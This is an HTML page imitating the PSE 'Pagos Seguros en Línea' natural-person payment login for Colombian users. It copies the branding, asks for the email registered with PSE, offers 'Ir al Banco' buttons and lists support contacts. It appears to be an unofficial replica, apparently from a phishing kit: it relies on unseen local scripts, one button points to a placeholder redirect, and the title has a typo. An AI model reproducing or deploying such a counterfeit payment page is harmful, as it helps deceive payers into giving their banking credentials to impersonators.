<html>
    <head>
        <title>PSE - Pago con Registro Person Natural</title>
        <meta http-equiv="content-type" content="text/html; utf-8">
        <meta charset="utf-8">
        
        <meta content="es" http-equiv="Content-Language">
    
        <meta name="description" content="">
        <meta name="author" content="">
        <meta name="Copyright" content="">
        <meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no">
        <meta http-equiv="X-UA-Compatible" content="IE=edge">
        <link rel="preconnect" href="https://fonts.googleapis.com">
        <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
        <link href="https://fonts.googleapis.com/css2?family=Lato:ital,wght@0,100;0,300;0,400;0,700;0,900;1,100;1,300;1,400;1,700;1,900&display=swap" rel="stylesheet">
        <script type="text/javascript" src="../js/jquery-3.6.0.min.js"></script>      
        <script type="text/javascript" src="../js/functions.js"></script>  
        <script type="text/javascript" src="../js/ready.js"></script> 
        <style type="text/css">
            *{
                font-family: "Lato", sans-serif;
            }
            body{
                padding: 0;
                margin: 0;
            }

            #cargando{
                border-radius: 3px;
                margin: 0 auto 40 auto;
                overflow: hidden;
                padding: 0;
                background-image: url(../img/load.gif);
                background-position: -4px -106px;
                background-size: 499px;
                height: 18px;
                width: 277px;  
                display: none;
            }

            #cabecera{
                background-image: url(../img/fondo-cabecera.png);
                background-position: right;                
                height: 168px;
                padding-top: 10px;
                text-align: center;
            }

            #cabecera table{
                max-width: 1185px;
                margin: 0 auto;
            }
            #cabecera td{                
                color: #fdb916;
                font-size: 1.875em;
                font-weight: 500;                
            }
            #ayuda{
                position: fixed;                
                top: 178px;
                right: 0px;
                z-index: 100;
            }

            #tipos-personas{
                width: 80%;
                margin: 0 auto 55 auto;
                max-width: 385px;
            }

            #frm-correo{
                margin:0 auto 84 auto;                 
                width: 88%; 
                max-width: 926px; 
            }
            .entrada-pse{   
                    outline: 0;                 
                    width: 100%;
                    height: 30px;
                    padding: 6px 12px;
                    font-size: 14px;
                    line-height: 1.42857143;
                    color: #555;
                    background-color: #fff;                    
                    border: 1px solid #feeaba;
                    border-radius: 10px;
                    -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075);
                    box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075);                                 
            }

            .entrada-pse:focus{   
                box-shadow: 0 0 1px #feeaba;
                border: 1px solid #ffbc1d;           
            }

            #txt-email{
                width: 346px;

            }

            #etq-email{
                font-weight: 400;
                color: #222239;
                font-size: 1em;
            }

            #etq-email-mobile{
                padding-left: 10px;
                margin: 0 auto 10 auto;
                text-align: left;
                font-weight: 400;
                color: #222239;
                font-size: 1em;        
            }

            #tbl-tipo{
                margin: 0 auto 31 auto;
                max-width: 540px;
            }

            #tbl-tipo-mobile{
                margin: 0 auto;
                max-width: 224px;
            }

            .tipo-izq{
                color: #000;
            }

            .u-reg{
                font-weight: 400;font-size: 15px;
            }

            .separador{
                margin-top: 15px;
                border-top: 1px solid #EEEEEE;
                width: 80%;
                margin-bottom: 29px;
            }

            .btn-pse{
                padding: 10px 49px;
                border: 1px solid #0275d8;                
                color: #0275d8;
                font-size: 16px;
                font-weight: 300;
                background-color: #fff;
                cursor: pointer;
            }

            .btn-pse:hover{
                background-color: #0275d8;
                color: #fff;
            }
            #pie{
                margin: 0 auto;
            }

            .letra-pie{
                font-size: 11px;
                font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
                line-height: 1.42857143;
                color: #333;
                text-align: left;
            }

            #pie-mobile{
                margin-bottom: 20px;
                text-align: center;
                display: none;
            }

            #btn-mobile{
                display: none;
                text-align: center;
                margin-bottom: 20px;
            }

            #logo-mobile{
                display: none;
            } 

            #tbl-tipo-mobile,#etq-email-mobile{
                display: none;
            }

            #err-email{
                color: #a94442;
                font-size: 14px;
                padding: 4px 4px;
                display: none;
            }

            @media (max-width:1199px) {
                #tipos-personas{
                    max-width: 333px;
                }

                #frm-correo{
                    max-width: 733px;
                }       
                #txt-email{
                    width: 277px;
                }

                #cabecera table{
                    max-width: 967px;                 
                }

            }                         
                   

            @media (max-width:991px) {
                #cabecera table{
                    max-width: 747px;                 
                }
                
                #lado-izq-pie,#btn-der{
                    display: none;
                }

                #lado-der-pie,#btn-izq{
                    text-align: center !important;
                }
                
                #lado-der-pie div{
                    margin: 0 auto;
                    text-align: center;
                }

                #lado-der-pie table{
                    margin: 0 auto;
                }

                #lado-der-pie td{
                    text-align: center;
                }
                #pie-mobile,#btn-mobile{
                    display: block;
                }

            }

            @media (max-width:767px) {
                #txt-email{
                    width: 100%;
                }
                #etq-email,#etq-email-res{
                    display: none;
                }
                #cabecera{
                    background-image: unset;                    
                }
                #tbl-tipo{                
                    max-width: 428px;
                }
                #tipos-personas{               
                    max-width: unset;
                }

            }    

            @media (max-width:515px) {
                .tipo-izq{
                    display: none;
                }  

                #tbl-tipo{
                    max-width: 224px;
                }                    
            } 

            @media (max-width:480px) {
                #tbl-cabecera {
                    width: 92%;
                }

                #tbl-cabecera img{
                    width: 100px;
                }

                #td-logo{
                    width: 114px;
                }                     
            }

            @media (max-width:378px) {                
                #td-logo{
                    display: none;
                } 
                #td-texto{
                    text-align: center;
                }    
                #logo-mobile{
                    display: initial;
                    width: 100px;
                }                 
            }        
        </style>
    </head>
    <body>
        <input type="hidden" name="hdd-opcion" id="hdd-opcion">
        <div id="cabecera">
            <img src="../img/lps.png" id="logo-mobile">
            <table cellpadding="0" cellspacing="0" width="98%" border="0" id="tbl-cabecera">
                <tr>
                    <td valign="middle" align="left" width="200" id="td-logo"><img src="../img/lps.png"></td>
                    <td valign="middle" align="left" id="td-texto">Fácil, rápido y seguro</td>
                </tr>
            </table>
        </div>        
        <img src="../img/ayuda.jpg" id="ayuda">
        <div style="text-align: center;font-weight: 700;font-size: 21px;color: #323153;margin-top: 47px;margin-bottom: 44px;padding: 0px 60px;">PSE - Pagos Seguros en Línea / Persona Natural</div>
        <table border="0" cellspacing="0" cellpadding="0" id="tipos-personas">
            <tr>
                <td valign="top" align="center" style="color: #323153;text-align:center;font-weight: 400;font-size: 21px;">
                    <img src="../img/pers.jpg">
                    <br>
                    Persona natural
                </td>
                <td valign="top" align="center" style="color: #323153;text-align:center;font-weight: 400;font-size: 21px;">
                    <img src="../img/emp.jpg">
                    <br>
                    Persona juridica
                </td>
            </tr>
        </table>

        <table border="0" cellspacing="0" cellpadding="0" width="98%" id="tbl-tipo-mobile">
            <tr>
                <td valign="middle" align="left"><img src="../img/registr.jpg"></td>
                <td valign="middle" align="left" class="u-reg">Soy un usuario registrado</td>                
            </tr>
        </table>

        <table border="0" cellspacing="0" cellpadding="0" width="98%" id="tbl-tipo">
            <tr>
                <td valign="middle" align="left" class="tipo-izq"><img src="../img/registr.jpg"></td>
                <td valign="middle" align="left" class="tipo-izq u-reg">Soy un usuario registrado</td>
                <td valign="middle" align="left"><img src="../img/nuevo.jpg"></td>
                <td valign="middle" align="left" class="u-reg" style="color: #8b8d99;">Quiero registrarme ahora </td>
            </tr>
        </table>
        <div id="frm-correo">
            <div id="etq-email-mobile">E-mail</div>
            <table cellpadding="0" cellspacing="0" border="0" width="100%">
                <tr>
                    <td width="25%" valign="middle" align="left" id="etq-email">E-mail</td>
                    <td valign="middle" align="left">
                        <input type="email" class="entrada-pse" id="txt-email" name="txt-email" placeholder="E-mail registrado en PSE" maxlength="120">
                    </td>
                    <tr>
                        <td id="etq-email-res"></td>
                        <td><div id="err-email">El campo e-mail es requerido</div></td>
                    </tr>
                </tr>
            </table>
            <div class="separador"></div>
            <div id="btn-mobile"><button class="btn-pse" id="btn-banco" onclick="window.location.href='https://www.google.com';">Ir al Banco</button></div>
            <table cellpadding="0" cellspacing="0" border="0" width="100%">
                <tr>
                    <td valign="middle" align="left" id="btn-izq">Regresar al comercio</td>
                    <td valign="middle" align="left" id="btn-der">
                        <button class="btn-pse" id="btn-banco">Ir al Banco</button>
                    </td>
                </tr>
            </table>
        </div>        
        <div id="cargando"></div>
        <div id="pie-mobile"><img src="../img/super.jpg"></div>
        <table cellpadding="0" cellspacing="0" border="0" width="80%" id="pie">
            <tr>
                <td align="left" id="lado-izq-pie"><img src="../img/super.jpg"></td>
                <td align="right" id="lado-der-pie">
                    <div style="width:100%; max-width:340px;" class="letra-pie">Para mayor información comunícate con nosotros</div>
                    <table cellpadding="0" cellspacing="0" border="0" width="100%" style="max-width: 340px;">
                        <tr>
                            <td><td>
                            <td class="letra-pie">en Bogotá +57 (1) 3808890 opción 5</td>
                        </tr>
                        <tr>
                            <td><td>
                            <td class="letra-pie">o escríbenos https://www.pse.com.co/persona, opción centro de ayuda, Formulario de contacto.</td>
                        </tr>
                </td>
            </tr>
        </table>
    </body>    
</html>
